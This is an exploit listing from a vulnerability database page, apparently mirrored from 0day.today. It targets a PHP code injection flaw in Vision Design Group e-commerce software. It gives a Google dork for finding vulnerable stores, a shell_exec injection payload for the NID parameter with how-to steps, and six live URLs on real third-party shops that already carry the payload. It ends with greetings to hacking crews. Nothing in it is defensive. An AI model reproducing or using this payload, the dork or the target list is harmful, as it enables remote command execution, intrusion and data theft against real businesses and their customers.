Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMindCracker1337DAY-ID-22740
HistoryOct 09, 2014 - 12:00 a.m.

e-Commerce Vision Design Group Code injection Vulnerability

2014-10-0900:00:00
MindCracker
0day.today
70
JSON

Exploit for php platform in category web applications

# Exploit Title: e-Commerce Vision Design Group Code injection
# Date: 10/09/2014
# Exploit Author: MindCracker - Team MaDLeeTs
# Contact : [email protected] | FB.Com/Pakistani1337
# Greetz : KhantastiC - b0x - 1337 - H4x0rl1f3 - Shadow008 - Invectus
# Software Link: http://www.visiondesign.com
# Tested on: Linux
# Vulnerable File: product_display.php
# Google Dork: inurl: /store/template/product_display.php or intext:Web design & e-Commerce : Vision Design Group, Inc. inurl:/store/template/

HOW TO
======

Just add ?NID=${@print(shell_exec(Your Command))}  after product_display.php 
For Example 
site.com/store/template/product_display.php?${@print(shell_exec(ls))}
Then check the source page after executing you will get the result there

Demo Sites
====
https://www.bambinoland.com//store/template/product_display.php?NID=%24{%40print%28shell_exec%28ls%29%29}
http://www.sturdiwheat.com/store/template/product_display.php?NID=%24{%40print%28shell_exec%28ls%29%29}
http://www.timtrost.com//store/template/product_display.php?NID=%24{%40print%28shell_exec%28ls%29%29}
http://www.burros.com/store/template/product_display.php?NID=%24{%40print%28shell_exec%28ls%29%29}
https://www.twistofnature.com/store/template/product_display.php?NID=%24{%40print%28shell_exec%28ls%29%29}
http://www.huntfish.info/store/template/product_display.php?NID=%24{%40print%28shell_exec%28ls%29%29}


We are: 1337 | Shadow008 | H4x0rL1f3 | H4x0r HuSsy | KhantastiC HaXor | InvectuS | Dr.Z0mbie | phpBuGz | madcodE | r00x | Don |
Sizziling Leet | Deatth ArrivaLz | MaD GirL | Sn!p3r_GS | DeXter | Neo Haxor | Darksnipper | [email protected] Mind | Error404
Pain006 | b0x | R3DL0F | Sahrawi | 3thicaln00b | Hmei7 | CutY | infinityl33ts | l4m3r | skywalk3r | Force Ex
Sniffer | AL.MaX HaCkEr | M4DSh4K | H3ll-dz | gujjar(pcp) | KAmi HaXor | BMPoC | H4x0r10ux M1nd
H4x0r_kSa | Gh0St_kSa | H4CK3R $P1D3R | Striker Rude | 8thbit | AZ Sn1ff3r (PCP)
Pak Defender | VIRkid | TR4CK3R | _-_ L.a.F.a.n.G.a _-_ | Trafalgar Law | yhi | Rox Root | Sufyan Mughal & Pakistan Cyber Army

#  0day.today [2018-01-06]  #
JSON